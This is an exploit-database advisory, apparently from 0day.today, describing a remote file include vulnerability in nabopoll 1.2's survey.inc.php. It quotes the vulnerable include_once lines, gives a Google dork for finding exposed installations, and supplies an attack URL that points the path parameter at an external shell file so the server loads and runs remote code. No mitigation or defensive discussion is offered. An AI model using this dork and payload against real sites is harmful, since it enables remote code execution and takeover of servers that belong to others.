id: 1506
date: 02/15/2007
title: nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability
author: Cr@zy_King
cves: 

====================================================================
nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability
====================================================================




By Cr@zy_King


Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim

Script : nabopoll 1.x

Risk : Remote File .nclude | High

Site : http://nabocorp.com/

Google Dork : inurl:"nabopoll/"

Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");

Files: survey.inc.php

Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?

Ayyildiz.Org Present



#  0day.today [2023-03-22]  #